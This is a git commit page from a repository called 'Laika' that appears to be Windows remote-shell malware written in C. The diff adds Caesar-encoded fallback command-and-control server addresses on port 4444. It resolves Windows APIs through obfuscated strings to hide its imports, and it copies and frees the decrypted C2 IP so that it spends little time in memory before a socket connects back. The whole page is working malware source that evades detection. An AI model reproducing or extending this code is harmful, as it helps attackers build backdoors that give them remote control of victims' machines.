patate/Laika
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

fix: decrypting an ip that is already decrypted

Browse Source
This commit is contained in:
ALittlePatate
2023-02-15 19:53:56 +01:00
parent a5bb8718a3
commit 02014633a1
4 changed files with 34 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
Laika/config.h
View File

@@ -1,3 +1,9 @@
#define FALLBACK_SERVERS 1
char* fallback_servers[1] = { char* fallback_servers[1] = {
"=3=3=3=", "6>736;=3638:",
};
int fallback_servers_ip[1] = {
4444,
}; };

17
Laika/main.c
View File

@@ -105,8 +105,6 @@ void SendShellEndedSignal(SOCKET sock) {
} }
} }
#define FALLBACK_SERVERS 4
int serv = -1; int serv = -1;
int main() { int main() {
InitApis(); InitApis();
@@ -124,7 +122,6 @@ int main() {
struct sockaddr_in server; struct sockaddr_in server;
char* server_reply = (char*)Api.malloc(BUFFER_SIZE); char* server_reply = (char*)Api.malloc(BUFFER_SIZE);
server.sin_family = AF_INET; server.sin_family = AF_INET;
server.sin_port = Api.htons(1337);
WORD wVersionRequested = MAKEWORD(2, 2); WORD wVersionRequested = MAKEWORD(2, 2);
WSADATA wsaData; WSADATA wsaData;
@@ -142,7 +139,19 @@ retry:
if (serv > FALLBACK_SERVERS - 1) { if (serv > FALLBACK_SERVERS - 1) {
serv = 0; serv = 0;
} }
server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(fallback_servers[serv]));
//on fait une copie de l'ip chiffr<66>e, puis on la free
//<2F>a <20>vite qu'elle reste dans la m<>moire trop longtemps
//<2F>a <20>vite aussi qu'on utilise CAESAR_DECRYPT sur une ip d<>j<EFBFBD> d<>crypt<70>e
size_t len = strlen(fallback_servers[serv]);
char* Tmp = Api.malloc(len + 1);
Api.strcpy(Tmp, fallback_servers[serv]);
server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp));
Api.free(Tmp);
server.sin_port = Api.htons(fallback_servers_ip[serv]);
//Create socket //Create socket
sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

23
Laika/resolve_apis.c
View File

@@ -13,6 +13,18 @@ void InitApis() {
} }
Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx")); Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx"));
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) {
return;
}
Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~"));
Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru"));
Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx"));
Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy"));
Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj")); Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj"));
Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj")); Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj"));
Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj")); Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj"));
@@ -40,17 +52,6 @@ void InitApis() {
Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw")); Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw"));
Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu")); Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu"));
Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw")); Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw"));
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) {
return;
}
Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy"));
Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru"));
Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx"));
} }
void FreeApis() { void FreeApis() {

2
Laika/resolve_apis.h
View File

@@ -21,6 +21,7 @@ typedef void* (WINAPI* Tmalloc)(size_t);
typedef void(WINAPI* Tfree)(void*); typedef void(WINAPI* Tfree)(void*);
typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t); typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t);
typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t); typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t);
typedef char*(WINAPI* Tstrcpy)(char*, const char*);
typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
@@ -67,6 +68,7 @@ typedef struct ApiList {
TGetProcAddress GetProcAddress; TGetProcAddress GetProcAddress;
Tmbstowcs mbstowcs; Tmbstowcs mbstowcs;
Tstrcpy strcpy;
} API; } API;
void InitApis(); void InitApis();